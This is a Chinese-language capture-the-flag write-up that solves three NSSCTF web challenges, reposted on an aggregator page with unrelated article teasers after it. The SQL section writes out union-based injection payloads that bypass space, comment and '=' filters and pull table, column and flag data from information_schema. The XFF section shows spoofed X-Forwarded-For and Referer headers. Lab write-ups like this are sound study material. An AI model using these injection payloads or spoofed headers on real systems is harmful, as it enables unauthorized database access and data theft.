NSSCTF-Web题目9

目录

[SWPUCTF 2021 新生赛]sql

1、题目

2、知识点

3、思路

[SWPUCTF 2022 新生赛]xff

1、题目

2、知识点

3、思路

[FSCTF 2023]源码!启动!

1、题目

2、知识点

3、思路


[SWPUCTF 2021 新生赛]sql

1、题目

2、知识点

SQL注入,空格、注释符等绕过

3、思路

打开题目

根据提示可以知道,变量是wllm

?wllm=1

数据回显,加入单引号’

?wllm=1'

数据库语句报错,根据提示信息,我们可以猜测是单引号的闭合问题

输入注释符--+ #,

说明注释符被过滤,这时候我们考虑绕过,可以使用url编码进行绕过,#为%23,--+编码后还是被过滤,所以不行,在尝试的过程中,发现空格也被过滤,空格绕过有很多种,根据题目而定,这里可以使用注释进行绕过/**/

常见的空格绕过还有:

两个空格代替一个空格

%a0

使用()等

?wllm=1'/**/%23

这里数据正常回显,说明是单引号的闭合错误,同时也绕过了空格、注释符的过滤,接下来的语句空格都用/**/代替

判断回显位置(注意wllm是-1,因为使用union语句,前面为空,才会执行后面的语句)

?wllm=-1'/**/union/**/select/**/1,2,3%23

判断数据库

?wllm=-1'/**/union/**/select/**/1,2,database()%23

当前数据库为test_db

判断表名

这里发现=也被过滤了,可以使用like来进行绕过

?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**

/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

判断字段名

?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23

判断flag

这里因为字符长度的显示,需要使用mid()函数

?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),1,20)/**/from/**/test_db.LTLT_flag%23

?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),20,40)/**/from/**/test_db.LTLT_flag%23

?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),40,60)/**/from/**/test_db.LTLT_flag%23

注意,这些字符需要注意不要重复

得到flag:NSSCTF{2d6117ae-ea77-425d-850e-88a53030a9e8}


[SWPUCTF 2022 新生赛]xff

1、题目

2、知识点

http头部,xff

3、思路

这一题跟 [LitCTF 2023]Http pro max plus有一点相似,可以参考

NSSCTF-Web题目8-CSDN博客

这里提示我们要使用自己的电脑,估计就要本地IP,打开BP进行抓包,修改头部

加上X-forwarded-for:127.0.0.1

这里提示我们要从home页面访问

加上Referer:home

得到flag:NSSCTF{th1s_xff_1s_e4ay}


[FSCTF 2023]源码!启动!

1、题目

2、知识点

源码获取,开发者模式使用

3、思路

打开题目

没有什么提示信息,右键查看源码,发现右键被禁用

使用浏览器

得到flag:NSSCTF{fbb98d46-c9b4-4161-b43e-544459962400}


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/854910.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

京东和天猫各渠道区别是什么?你了解吗?如何快速了解两个平台渠道推广

1.快车/直通车区别: 京东:不能投竞品词,能投定向商品选竞品,因为京东是卖平台流量和商品(自营(主收入)),不可以投竞品词是为了保护自己店铺的品牌流量; 天猫:只卖平台流量,不卖商品,所以允许竞品词投放; 2.竞品人群圈选: 因为数坊是自身品牌数据分析平台,所…

基于EXCEL数据表格创建省份专题地图

1 数据源 随着西藏于5月1日发布2022年一季度经济运行情况,31省份一季度GDP数据已全部出炉。 总量方面,粤苏鲁稳居前三;增速方面,23省份高于“全国线”,新疆表现最佳,增速达到7.0%。 表格表现数据不够直观…

Aeron:Multi-Destination-Cast

Multi-Destination-Cast(MDC)是一种功能,允许 Aeron 从单个 Publication 同时向多个目的地传送数据。Multiple-Destination-Cast是 Aeron 的一项高级功能,本指南将介绍如何开发一个简单示例的基本知识。 一、MDC Publications 注&…

MAP REDUCE

大数据处理框架概念 定义:由一系列组件构成,负责对数据系统中的数据进行计算。组件: 处理引擎:实际执行数据操作的独立组件。处理框架:包含多个协同工作的组件。 框架与引擎的区别 引擎:单一的&#xf…

NV-Embed论文阅读笔记

这是NVIDIA的一篇论文,LLM通常使用的是GPT的decoder范式作为一个生成模型,文章探讨如何利用这样的decoder生成模型来实现BERT这样的encoder的功能,即提取有效的embedding。现有的方法提取embedding的方式无非是 1 mean pooling; 2…

计算机相关专业是否仍是“万金油”的选择?

亲爱的朋友们: 2024 年高考已然落幕,数百万高三学子站在了人生的重要十字路口,面临着选择大学专业这一关键抉择。在这个节点上,计算机相关专业是否还能被称为“万金油”的选择呢? 相信大家都知道,在最近这几…

经典神经网络(11)VQ-VAE模型及其在MNIST数据集上的应用

经典神经网络(11)VQ-VAE模型及其在MNIST数据集上的应用 我们之前已经了解了PixelCNN模型。 经典神经网络(10)PixelCNN模型、Gated PixelCNN模型及其在MNIST数据集上的应用 今天,我们了解下DeepMind在2017年提出的一种基于离散隐变量(Discrete Latent va…

celery骚操作之把任务写在类中可能造成的问题

celery注册异步函数是模块级别的,也就是同个模块不能有同名函数,比如搞个骚操作,将celery任务写在类中如下(注意这个静态方法是个特殊的装饰器,他实际是个描述器,他必须写在最上面) 实际注册的任务是apps.business.tas…

3D视觉引导机器人提升生产线的自动化水平和智能化程度

随着智能化技术的不断发展,汽车制造企业正积极寻求提升智能化水平的途径。富唯智能的3D视觉引导机器人抓取技术为汽车制造企业提供了一种高效、智能的自动化解决方案。 项目目标 某汽车制造企业希望通过引入智能化技术提升生产线的自动化水平和智能化程度。他们希望…

python错题(3)

round四舍五入 title()把单词首字母大写 all() 函数用于判断给定的可迭代参数 iterable 中的所有元素是否都为 TRUE,如果是返回 True,否则返回 False。 元素除了是 0、空、None、False 外都算 True 。空元组、空列表返回值为True,这里要特…

2023数A题——WLAN网络信道接入机制建模

A题——WLAN网络信道接入机制建模 思路:该题主要考察的WLAN下退避机制建模仿真。 资料获取 问题1: 假设AP发送包的载荷长度为1500Bytes(1Bytes 8bits),PHY头时长为13.6μs,MAC头为30Bytes,MA…

是否可以外链代发?

当然是可以的,代发外链是一种有效的提升网站SEO排名和流量的方法。通过在高质量的网站上发布包含你网站链接的内容,可以提高你网站的权重和可信度。而在所有代发外链的方式中,GPB外链无疑是最好的选择。 GPB外链,每一条GPB外链都是…

【UE4】角色御剑飞行的蓝图实现

沉沉更鼓急,渐渐人声绝 吹灯窗更明,月照一天雪 UE4简单的实现御剑飞行的功能 契子✨ 所谓的御剑飞行的原理就跟 《御板》 飞行的原理差不多,不过是在人物脚上插把剑在飞行的时候显示出来罢了。简单来讲就是只要渲染做的足够牛,土鸡…

App上架和推广前的准备

众所周知,App推广的第一步是上架各大应用下载市场,然后才是其他推广渠道。所以本文主要分两部分,第一部分主要介绍的是上架各大应用市场方面的准备,第二部分主要介绍的是其他渠道推广方面的准备。 一、App上架前的准备 1.1 上架…

Servlet基础(续集2)

HttpServletResponse web服务器接收到客户端的http的请求,针对这个请求,分别创建一个代表请求的HttpServletRequest对象,代表响应的一个HttpServletResponse 如果要获取客户端请求过来的参数:找HttpServletRequest如果要给客户端…

【前端面试】二叉树递归模板和题解

递归模板和步骤 递归题目的通用步骤递归模板总结1. 树的遍历(DFS)2. 二叉树的最大深度3. 二叉树的最近公共祖先 递归题目的记忆技巧 递归题目的通用步骤 明确递归函数的功能:确定递归函数的输入参数和返回值,明确函数的功能。基准…

如何在本地部署ChatTTS? 完美部署 简单几步 cpu gpu cuda

前言 最近,24-05-27号,github上出现了一个新项目,ChatTTS。该项目提供了一个文本转语音(Text To Speech)的开源方案,同时支持中文和英文。在官网的演示视频中,可以看到合成效果高度接近真人。 到目前(06-04)为止,已经有18.3k的star。 那我们就来看看这个模型的基本…

63、上海大学:MSConvNet-多尺度卷积神经网络解码大鼠运动疲劳数据[攒劲的模型来喽]

1、介绍&#xff1a; 文章&#xff1a;<A multiscale convolutional neural network based on time-frequency features for decoding rat exercise fatigue LFP >&#xff0c;本文由上海大学于2024.4.8日发表于<Biomedical Signal Processing and Control >&…

语音翻译软件app排名来啦,这些工具让旅游畅通无阻

#这个夏天我们一定要去看海# 出国旅行时&#xff0c;语言障碍常常是最让人头疼的问题之一。 特别是在像缅甸这样英语并不普及的国家&#xff0c;基本的日常交流&#xff0c;比如用餐或问路&#xff0c;都可能成为难题。 然而&#xff0c;随着技术的进步&#xff0c;现在有了…

全功能知识付费小程序源码系统 界面支持万能DIY装修 带完整的安装代码包以及搭建部署教程

系统概述 在当今数字化时代&#xff0c;知识付费已经成为一种重要的商业模式。为了满足市场对于便捷、高效、个性化的知识付费解决方案的需求&#xff0c;小编给大家分享一款全功能知识付费小程序源码系统。这一系统不仅具备界面支持万能 DIY 装修的独特优势&#xff0c;还配备…